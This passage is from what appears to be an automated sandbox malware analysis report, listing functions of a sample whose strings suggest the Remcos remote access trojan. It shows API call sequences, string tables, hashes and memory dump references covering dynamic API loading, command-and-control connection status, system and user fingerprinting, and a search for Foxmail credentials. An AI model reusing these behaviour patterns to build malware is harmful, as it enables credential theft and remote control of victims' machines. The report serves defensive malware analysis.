                                                                                                                                                                    • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040F8CA
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                                                    • String ID: 4.9.4 Pro$override$pth_unenc
                                                                                                                                                                    • API String ID: 2281282204-930821335
                                                                                                                                                                    • Opcode ID: e8f8a8c6e09656479cbd18f8005b06e309874533347df5ec8e0d67fb659a5248
                                                                                                                                                                    • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                                                                                                                                                    • Opcode Fuzzy Hash: e8f8a8c6e09656479cbd18f8005b06e309874533347df5ec8e0d67fb659a5248
                                                                                                                                                                    • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00433837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,2414F648), ref: 00433849
                                                                                                                                                                    • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                                                                                                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1815803762-0
                                                                                                                                                                    • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                                                                                    • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                                                                                                                                                    • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                                                                                    • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041B60D Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B62A
                                                                                                                                                                    • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Name$ComputerUser
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4229901323-0
                                                                                                                                                                    • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                                                                                                                                                    • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                                                                                                                                                    • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                                                                                                                                                    • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.4 Pro), ref: 0040F8E5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                    • Opcode ID: 2888965568e38a2ba7a5abe7093904758464576a93ba76aee1c710f175ee0f35
                                                                                                                                                                    • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                                                                                                                    • Opcode Fuzzy Hash: 2888965568e38a2ba7a5abe7093904758464576a93ba76aee1c710f175ee0f35
                                                                                                                                                                    • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                                                                                                                                                    • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                                                                                                                                                    • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                                                                                                                                                    • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                                                                                                                                                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                                                                                                                                                    • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                                                                                                                                                                    • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                                                                                                                                                    • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                                                                                                                                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                                                                                                                                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                                                                                                                                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                                                                                                                                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                                                                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                                                                    • API String ID: 4236061018-3687161714
                                                                                                                                                                    • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                                                                                                                                    • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                                                                                                                                                    • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                                                                                                                                    • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00414F2A Relevance: 49.8, APIs: 5, Strings: 23, Instructions: 809sleepnetworkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
                                                                                                                                                                    • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                                                                                                                                                                    • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                                                                                                                                                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Sleep$ErrorLastLocalTime
                                                                                                                                                                    • String ID: | $%I64u$4.9.4 Pro$8SG$C:\Users\Public\Libraries\lhgtogaW.pif$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$PSG$Rmc-V052BG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                                                                                                                                    • API String ID: 524882891-3404565747
                                                                                                                                                                    • Opcode ID: 97aa9d39ba03ac9f0418f8daa75332d8d59cc8f14143478f3812eaa943049f73
                                                                                                                                                                    • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                                                                                                                                                                    • Opcode Fuzzy Hash: 97aa9d39ba03ac9f0418f8daa75332d8d59cc8f14143478f3812eaa943049f73
                                                                                                                                                                    • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00412AB4 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                                                                                                                                                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                                                                                                                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                                                                                                                                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                                                                                                                                                    • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                                                                                                                                                    • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                                                                                                                                                    • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                                                                                                                                                    • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00412E94
                                                                                                                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                                                                    • String ID: /stext "$0TG$0TG$NG$NG
                                                                                                                                                                    • API String ID: 1223786279-2576077980
                                                                                                                                                                    • Opcode ID: b3521872b4e8ea71a5be660746f06596cfd57c138b393e402164024caafab600
                                                                                                                                                                    • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                                                                                                                                                    • Opcode Fuzzy Hash: b3521872b4e8ea71a5be660746f06596cfd57c138b393e402164024caafab600
                                                                                                                                                                    • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C12EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 274C1434
                                                                                                                                                                      • Part of subcall function 274C10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 274C1137
                                                                                                                                                                      • Part of subcall function 274C10F1: lstrcatW.KERNEL32(?,?), ref: 274C1151
                                                                                                                                                                      • Part of subcall function 274C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 274C115C
                                                                                                                                                                      • Part of subcall function 274C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 274C116D
                                                                                                                                                                      • Part of subcall function 274C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 274C117C
                                                                                                                                                                      • Part of subcall function 274C10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 274C1193
                                                                                                                                                                      • Part of subcall function 274C10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 274C11D0
                                                                                                                                                                      • Part of subcall function 274C10F1: FindClose.KERNEL32(00000000), ref: 274C11DB
                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 274C14C5
                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 274C14E0
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 274C150F
                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 274C1521
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 274C1547
                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 274C1553
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 274C1579
                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 274C1585
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 274C15AB
                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 274C15B7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                    • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                    • API String ID: 672098462-2938083778
                                                                                                                                                                    • Opcode ID: 5fea99fc0cf7c31842970930a8e67004c510af118ff0daccc46befcb7895d2cb
                                                                                                                                                                    • Instruction ID: 6ef4f6683d87900bfb5b60b5ded1d08f25d07bc999166209972b3c83cb50bf49
                                                                                                                                                                    • Opcode Fuzzy Hash: 5fea99fc0cf7c31842970930a8e67004c510af118ff0daccc46befcb7895d2cb
                                                                                                                                                                    • Instruction Fuzzy Hash: 6881C575A4035CA9EB20DBA1DC85FEF7379EF84B00F10159EF908E7190EAB15A84CB95
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040A726 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(00001388), ref: 0040A740
                                                                                                                                                                      • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                                                                                                                                                      • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                                                                                                                                      • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                                                                                                                                      • Part of subcall function 0040A675: FindCloseChangeNotification.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                                                                                                                                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$AttributesCreate$Sleep$ChangeCloseDirectoryExistsFindNotificationPathSize
                                                                                                                                                                    • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                                                                                                                                    • API String ID: 110482706-1152054767
                                                                                                                                                                    • Opcode ID: 28f8d381b3915e0b4d42bf4987c46cb5f57f575cbeecee27ce3475874b3df8b6
                                                                                                                                                                    • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                                                                                                                                                    • Opcode Fuzzy Hash: 28f8d381b3915e0b4d42bf4987c46cb5f57f575cbeecee27ce3475874b3df8b6
                                                                                                                                                                    • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                                                                                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                                    • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                                    • API String ID: 994465650-2151626615
                                                                                                                                                                    • Opcode ID: 19932798ed07d1ae22d126be326c9da79f3bb29c47122c8f9a0e48a384f387e3
                                                                                                                                                                    • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                                                                                                                                                    • Opcode Fuzzy Hash: 19932798ed07d1ae22d126be326c9da79f3bb29c47122c8f9a0e48a384f387e3
                                                                                                                                                                    • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

